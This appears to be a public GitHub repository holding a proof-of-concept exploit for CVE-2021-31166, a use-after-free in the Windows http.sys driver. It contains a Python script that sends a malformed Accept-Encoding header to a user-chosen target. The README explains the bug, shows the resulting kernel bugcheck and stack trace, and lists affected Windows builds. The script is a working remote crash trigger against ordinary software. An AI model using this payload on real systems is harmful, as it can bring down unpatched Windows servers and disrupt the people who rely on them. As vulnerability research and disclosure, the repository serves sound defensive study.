├── pics
    ├── trigger.gif
    └── rel04vsrel05.png
├── cve-2021-31166.py
├── LICENSE
└── README.md


/pics/trigger.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0vercl0k/CVE-2021-31166/HEAD/pics/trigger.gif


--------------------------------------------------------------------------------
/pics/rel04vsrel05.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0vercl0k/CVE-2021-31166/HEAD/pics/rel04vsrel05.png


--------------------------------------------------------------------------------
/cve-2021-31166.py:
--------------------------------------------------------------------------------
 1 | # Axel '0vercl0k' Souchet - May 16 2021
 2 | import requests
 3 | import argparse
 4 | 
 5 | def main():
 6 |     parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
 7 |     parser.add_argument('--target', required = True)
 8 |     args = parser.parse_args()
 9 |     r = requests.get(f'http://{args.target}/', headers = {
10 |         'Accept-Encoding': 'doar-e, ftw, imo, ,',
11 |     })
12 |     print(r)
13 | 
14 | main()


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2021 Axel Souchet
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2021-31166: HTTP Protocol Stack Remote Code Execution Vulnerability
 2 | 
 3 | This is a proof of concept for [CVE-2021-31166](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166) ("HTTP Protocol Stack Remote Code Execution Vulnerability"), a use-after-free dereference in `http.sys` patched by Microsoft in May 2021. According to this [tweet](https://twitter.com/metr0/status/1392631376592076805) the vulnerability has been found by [@_mxms](https://twitter.com/_mxms) and [@fzzyhd1](https://twitter.com/fzzyhd1).
 4 | 
 5 | ![trigger](pics/trigger.gif)
 6 | 
 7 | The bug itself happens in `http!UlpParseContentCoding` where the function has a local `LIST_ENTRY` and appends item to it. When it's done, it moves it into the `Request` structure; but it doesn't `NULL` out the local list. The issue with that is that an attacker can trigger a code-path that frees every entries of the local list leaving them dangling in the `Request` object.
 8 | 
 9 | ![rel04vsrel05](pics/rel04vsrel05.png)
10 | 
11 | Here is the bugcheck:
12 | 
13 | ```
14 | KDTARGET: Refreshing KD connection
15 | 
16 | *** Fatal System Error: 0x00000139
17 |                        (0x0000000000000003,0xFFFFF90EA867EE40,0xFFFFF90EA867ED98,0x0000000000000000)
18 | 
19 | Break instruction exception - code 80000003 (first chance)
20 | 
21 | A fatal system error has occurred.
22 | Debugger entered on first try; Bugcheck callbacks have not been invoked.
23 | 
24 | A fatal system error has occurred.
25 | 
26 | nt!DbgBreakPointWithStatus:
27 | fffff804`19410c50 cc              int     3
28 | 
29 | kd> kp
30 |  # Child-SP          RetAddr               Call Site
31 | 00 fffff90e`a867e368 fffff804`19525382     nt!DbgBreakPointWithStatus
32 | 01 fffff90e`a867e370 fffff804`19524966     nt!KiBugCheckDebugBreak+0x12
33 | 02 fffff90e`a867e3d0 fffff804`19408eb7     nt!KeBugCheck2+0x946
34 | 03 fffff90e`a867eae0 fffff804`1941ad69     nt!KeBugCheckEx+0x107
35 | 04 fffff90e`a867eb20 fffff804`1941b190     nt!KiBugCheckDispatch+0x69
36 | 05 fffff90e`a867ec60 fffff804`19419523     nt!KiFastFailDispatch+0xd0
37 | 06 fffff90e`a867ee40 fffff804`1db3f677     nt!KiRaiseSecurityCheckFailure+0x323
38 | 07 fffff90e`a867efd0 fffff804`1daf6c05     HTTP!UlFreeUnknownCodingList+0x63
39 | 08 fffff90e`a867f000 fffff804`1dacd201     HTTP!UlpParseAcceptEncoding+0x299c5
40 | 09 fffff90e`a867f0f0 fffff804`1daa93d8     HTTP!UlAcceptEncodingHeaderHandler+0x51
41 | 0a fffff90e`a867f140 fffff804`1daa8ab7     HTTP!UlParseHeader+0x218
42 | 0b fffff90e`a867f240 fffff804`1da04c5f     HTTP!UlParseHttp+0xac7
43 | 0c fffff90e`a867f3a0 fffff804`1da0490a     HTTP!UlpParseNextRequest+0x1ff
44 | 0d fffff90e`a867f4a0 fffff804`1daa48c2     HTTP!UlpHandleRequest+0x1aa
45 | 0e fffff90e`a867f540 fffff804`1932ae85     HTTP!UlpThreadPoolWorker+0x112
46 | 0f fffff90e`a867f5d0 fffff804`19410408     nt!PspSystemThreadStartup+0x55
47 | 10 fffff90e`a867f620 00000000`00000000     nt!KiStartSystemThread+0x28
48 | 
49 | kd> !analyze -v
50 | [...]
51 | *******************************************************************************
52 | *                                                                             *
53 | *                        Bugcheck Analysis                                    *
54 | *                                                                             *
55 | *******************************************************************************
56 | 
57 | KERNEL_SECURITY_CHECK_FAILURE (139)
58 | A kernel component has corrupted a critical data structure.  The corruption
59 | could potentially allow a malicious user to gain control of this machine.
60 | Arguments:
61 | Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).
62 | Arg2: fffff90ea867ee40, Address of the trap frame for the exception that caused the BugCheck
63 | Arg3: fffff90ea867ed98, Address of the exception record for the exception that caused the BugCheck
64 | Arg4: 0000000000000000, Reserved
65 | ```
66 | 
67 | ## Frequently Asked Questions
68 | 
69 | **Q: Is [Windows Remote Management (WinRM)](https://docs.microsoft.com/en-us/windows/win32/winrm/portal) affected?**
70 | 
71 | Yes (thanks to [@JimDinMN](https://twitter.com/JimDinMN) for sharing [his experiments](https://twitter.com/JimDinMN/status/1395071966487269376)).
72 | 
73 | **Q: Is [Web Services on Devices (WSDAPI)](https://docs.microsoft.com/en-us/windows/win32/wsdapi/wsd-portal) affected?**
74 | 
75 | Yes (thanks to [@HenkPoley](https://twitter.com/HenkPoley) for sharing his [results](https://twitter.com/HenkPoley/status/1394309837304082439)).
76 | 
77 | **Q: What are the affected versions of Windows?**
78 | 
79 | According to [Microsoft's documentation](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166), here are the affected platforms:
80 | 
81 | - Windows Server, version 2004 (or 20H1) (Server Core installation),
82 | - Windows 10 Version 2004 (or 20H1) for ARM64/x64/32-bit Systems,
83 | - Windows Server, version 20H2 (Server Core Installation),
84 | - Windows 10 Version 20H2 for ARM64/x64/32-bit Systems.
85 | 


--------------------------------------------------------------------------------